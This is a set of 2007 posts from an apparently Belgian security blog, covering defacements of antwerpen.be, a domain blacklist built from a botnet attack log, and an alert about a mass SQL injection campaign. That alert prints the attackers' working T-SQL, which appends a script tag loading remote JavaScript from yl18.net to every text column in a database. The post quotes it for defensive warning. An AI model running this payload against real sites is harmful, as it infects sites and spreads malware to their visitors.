08-11-07

Do not pannick, but think, plan and act

So we don't say that this weekend the internet and the world will come down, we only say that there is an increase in attacks on this belgian internet and that the jihad cyberattack announced and overhyped is just another negative stream that will happen this weekend.

So just as in old days, before you go home and leave your network alone, you

* close down the gateways of your network and make sure that there no stupid or default password on external servers

* patch and upgrade and firewall and antivirus and backup and monitor your external servers

* make a list of all the people you should call if there is a virus infection, a ddos or a hack

and if you really are in for some fun, you make an exercise about it. What would you do if sunday you were attacked by a virtual ddos and how long does it take to set the things in motion ?

Better be prepared than be sorry or on http://be-hacked.skynetblogs.be and on the news

17:43 Gepost door technology changes fast not a lot in Algemeen | Permalink | Commentaren (0) |  Facebook |

update can you still trust antwerpen.be servers ?

The antwerpen.be infrastructure was already hacked before and is now been hacked again and according to this article some servers are still running IIS 4.0 and NT

I didn't want to expose this in the hope that they would upgrade or something but they can get hacked bigtime now they didn't upgrade. They even didn't outsource the hosting of the sites in the meantime.

They keep these websites online running IIS 4 and put networks, backoffice and related sites and their users into danger. (read the article below about new viruses distributed by hacked servers)

This is their network http://www.robtex.com/dns/antwerpen.be.html 

If you find yourself on this list, please be sure that you have no trusted relationship with those servers that were hacked, in fact think if you wanne have anything to do with any of those servers that have no security review whatsoever and are put up as IIS 4.0 as if it is the most normal thing to do. 

As long as we don't have some itsecurity laws and audits around here your only defense is to be as selective as necessary in chosing who you will trust and with who you will share common dns and mailservers and so on. Keep in mind that this weekend is hyped as being dangerous with all kinds of attacks brewing around here.

Trust is fine, control is better

11:05 Gepost door technology changes fast not a lot in Algemeen | Permalink | Commentaren (0) |  Facebook |

A lesson in blacklisting and whitelisting

I received a listing of sites that are involved in a botnet-rootkit-zeroday attack on the network of a reader of this blog. If you have logs like this send them to the central international coordination center at http://isc.sans.org they even have a tool that sends them automatically

but I thought I will take the logfile and construct a block-blacklist out of them and learn you guys maybe something about how to set up such a list if you are confronted with such an event (as antivirus and antimalware tools are sometimes helpless for days or weeks before being able to defend you against the new tricks online).

It is clear from the attack that it is based on scripts and lists that are online and that are being placed on websites that maybe don't know that they are a vehicle for such a zombie attack against others (even if it could lead to financial damages under European law - tell this to your boss if you wants to diminish your security budget).

So we have to limit the outgoing http traffic of your computers on your network to those sites or domains. Just to be sure that if a site gets infected he can't get his contacts or updates from the network infrastracture of the botnet.

The first thing to do is to select the domainnames that come from dangereous cybercountries with which you have no relation or business contacts. Here you should change from blacklisting domains to whitelistings sites (everything is blocked except these sites). Put a phonenumber on your intranet where people can ask to whitelist a site for 'business reasons'.

The second thing to block if you are in a business network are the freehosters that clearly have no security service or don't care a bit and that are distributing malware and are zombie infected. Most of the free hosters seen in this attack are already in other blacklists for this.

The third thing is the list of the rest of the sites. In a good proxy you should be able to have a blacklist as long as you which without any effect on your speed. You can use also other services but you should test them first and count the false negatives.

Some years ago the specialists laughed with urlfiltering and said it was useful, now it has become a necessary component of a fast response against new and fast moving attacks. It also have a good impact on your defenses because they just need to drop it, not analyse it. So if you have a ddos and you know where it comes from and it is repeatingly from the same sources, this will help (remember 11/11)

If your users have nothing to do in the following countries
just block them

these domains are really high risk and should be blacklisted
and individual destinations should be whitelisted
*.ru russia
*.ro romenia
*.us not much used by USA states
*.tm not a country domain, but spammy
*.by Belarusse

These are other domains for consideration of blocking

*.tw taiwan
*.cl chili
*.to tongo

It is much more difficult to block .nl, .org, .it, .de
and so on

Free webspace hosters
blocking those can block some normal sites
the question is if users may go to personal sites

ifrance.com
geocities.com
ifreepages.com
bravehost.com
100webspace.net

Sites
lostwarriors.com
palahunterz.de
miniradio.no
altervista.org
rfidstore.it
black8.at
kit.net
soundoph.com
trosken.com
myhyanggi.com
pikant.hu
j24usa.com
godsteam.org
eventtoday.com
enteractive.nl
jazztel.es
bsalsa.com
intensivecareunit.co.uk
destra.ca
americanoffroaddepot.com
ripway.com
sunrunnerveterans.com
sg1-atlantis.com
orlandochristiansingles.org
theranchjohnstown.com
soundoph.com
kit.net
freehostia.com
mit-mediation.de

Some proxies and blocking tools want that you put a . or *. before the domainname.

You use this at your own risk. I am not resonsable if you use it without testing. It doesn't necessary mean that any contact to these domains shows an infection. It just gives you less work so you don't have to change the link, the domain or the way it is written or the IP address. Do not use this for other protocols like smtp.

Your input is always welcome

10:36 Gepost door technology changes fast not a lot in Algemeen | Permalink | Commentaren (1) |  Facebook |

BETTER BE PREPARED THAN BE SORRY

siren4


BOTNETS _ TURKISH HACKERS _ DDOS _ PHISHING _ VIRUS INSERTS_STORM WORM

and we should do as if everything is normal and there is nothing to worry about and there is nothing that should be done ......

01:19 Gepost door technology changes fast not a lot in Algemeen | Permalink | Commentaren (0) |  Facebook |

also belgian sites infected with virus after hack

According to the Internet Storm center (the thing that our politicians don't want to set up in Belgian even if they agreed to put into the Telecom law - it is much more important to squabble about BHV while your critical communication infrastructure is being attacked inside out without having the capabilities to respond effectively) there is an important and dangereous infection and password stealing script being placed on more than 40.000 websites already. They are busy trying to mobilise everybody to clean it up, but I think you should do also your own part and protect your network and your server.

First you should block at your firewall and all other filters every connection to 18.net/0.js  Do not hesitate to do this. It is absolutely necessary.

Secondly if you have a website, the attacks will for the moment use an SQL injection and this is the attack code

declare @m varchar(8000);
set @m='';
select @m=@m+'update['+a.name+']set['+b.name+']=rtrim(convert(varchar,'+b.name+'))+''<script
src="hxxp://yl 18.net/0.js"></script>'';' from dbo.sysobjects
a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'and
b.xtype=c.xtype and c.name='varchar'
set @m=REVERSE(@m)
set @m=substring(@m,PATINDEX('%;%',@m),8000);
set @m=REVERSE(@m);
exec(@m);

and this on as many pages of the website as it can find

The internet storm center calls on all ISP's to take out and clean up websites that are hijacked - injected with this code. In Belgium a simple Google trick already showed some Belgian sites being infected. DO NOT VISIT THEM.

Futurestep - a Korn/Ferry Comp<script src="http://yl18.net/0.js ...- [ Traduire cette page ] www.futurestep.be/ - 48k -

KornFerry Overview<script src=<script src="http://yl18.net/0.js ...-

and the whole

[ Traduire cette page ]


www.kornferry.com/

If you have a forum you should block all the script possibilities otherwise you will infect your users

Student Psychology - Research method presentation<script src="http ...- [ Traduire cette page ]

Research method presentation<script src="http://yl18.net/0.js"></script>, New Topic · Reply to
www.psypress.com/student/forum/topic.asp?TOPIC_ID=69 - 14k

It is even being introduced as additional newspage on news sites as here and look at the name of the page

Technology Group International<script src="http://yl18.net/0.js ...- [ Traduire cette page ]

The newest version of Enterprise 21 offers significant enhancements designed to improve

www.manubiz.com/channel/news.asp?news=H4ED8KE9 - 4k -

And it are domains from all over the world that are being attacked,

from tn (tunesia) to uk to org to com and so on

a google for the script shows 50.000 pages, this is already more than 10.000 new pages

since the Internet storm center launched its alert

I think this will be spreading even more and it seems that antiviruses aren't very effective for now

and if thought that professional sites had professional security, think again

Organon International Inc. Profile- [ Traduire cette page ]

LEUVEN, Belgium, January 15 /PRNewswire/ --  "http://yl18.net/0.js">. Website:, http://www.organon.com ...
www.smartbrief.com/news/AABB/companyData.jsp?companyId=18199 - 47k -
  

I am sure that the Internet storm center will follow up on the story

http://www.incidents.org/diary.html?storyid=3621 

we will also

 

 

 

00:45 Gepost door technology changes fast not a lot in Algemeen | Permalink | Commentaren (0) |  Facebook |

07-11-07

hack of the day antwerpen.be (updated)

They have been replaced this morning, but yesterday they were hacked and this shows for important hosters nowadays the importance of permanent monitoring.

I WILL REPEAT THIS OVER AND OVER AGAIN : IF YOU WERE ALREADY HACKED BEFORE YOU WILL BE ATTACKED OVER AND OVER AGAIN AND YOU WILL BE HACKED AGAIN IF YOU LET DOWN YOUR GUARD.

ocmw.antwerpen.be/ Hacked By PowerDream   (click here # and mycopy for the hack)
antwerpen.be Hacked By PowerDream   (click here # and mycopy for the hack)
antwerpen.be Hacked By PowerDream  (click here # and mycopy for the hack)
Update : the question is of course if they have analyzed what happened and if they have taken action to fix the whole and to better defend their machine - or migrate. I am not going to scan their machines that would be totally illegal but I would - if I was them - scan their servers with the three most popular attack tools from outside the network with a 'black box'. The three tools to use are Metasploit - nmap en nessus
If there are still people that don't believe that a turkish hacking campaign is under way and still don't have the guts to do something it is becoming time because if antwerpen.be falls than or the antwerpen.be IT guys are a bunch of irresponsable amateurs or the hackers do really know what they are doing. So control your servers, control your logs, make backups, close down access to people that don't really need it and upgrade and patch everything that you have forgotten to do lately.
technical note : there are problems with the RSS feeds from furl.net and they have been informed. We hope to have clean RSS feeds when the problem will be solved and we hope this will be soon. For the moment the published feeds take all the headlines not only those from the chosen categories.

23:29 Gepost door technology changes fast not a lot in Algemeen | Permalink | Commentaren (0) |  Facebook |

ING first to massively replace its workers by callcenters

ING is moving in Belgium from mortar banks to webbanks and for this reason will put more than 800 people out of a job. They will take others, but these will have to work in a callcenter and will probably be less paid. So you don't have to go to India to lower workingstandards.

So if you do only webbanking or selfcashing at your supermarket, don't be surprised afterwards that those not-so-quite intelligent won't a find a job any more. And don't be surprised either if you find out afterwards that the webservice won't stay cheap or free or as safe as they say.... You already have less consumer rights on the online banking against those on paper.

read the 'player piano'  by Kurt Vonnegut (google :  "piano player" vonnegut )

15:06 Gepost door technology changes fast not a lot in Algemeen | Permalink | Commentaren (0) |  Facebook |